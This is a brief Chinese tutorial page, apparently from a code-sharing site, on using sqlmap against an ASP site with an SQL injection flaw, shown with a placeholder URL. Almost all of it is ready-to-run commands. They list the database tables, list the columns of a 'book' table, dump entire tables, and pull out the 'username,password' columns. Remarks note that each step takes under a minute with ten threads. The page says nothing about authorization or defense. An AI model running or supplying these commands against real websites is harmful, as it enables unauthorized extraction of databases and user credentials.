首页 > 代码库 > sqlmap测试asp实战

sqlmap测试asp实战

如果检测到某个网址,比如www.XXXXXX.asp?id=26存在sql注入漏洞

爆表名

sqlmap -u "www.XXXXXX.asp?id=26" --tables

线程选10不到1分钟获取到所有表名

技术分享

爆字段

这里针对book表

sqlmap -u "www.XXXXXX.asp?id=26" --columns -T "book"

线程数选10

同样不到一分钟,book表所有的字段全都爆出来了

技术分享

获取所有表的内容

sqlmap -u "www.XXXXXX.asp?id=26" --dump

只获取某个表的内容

 

sqlmap -u "www.XXXXXX.asp?id=26" --dump -T "book"

只获取某个表中某些列的内容

sqlmap -u "www.XXXXXXX.asp?id=26" --dump -C "username,password" -T "book"

 

sqlmap测试asp实战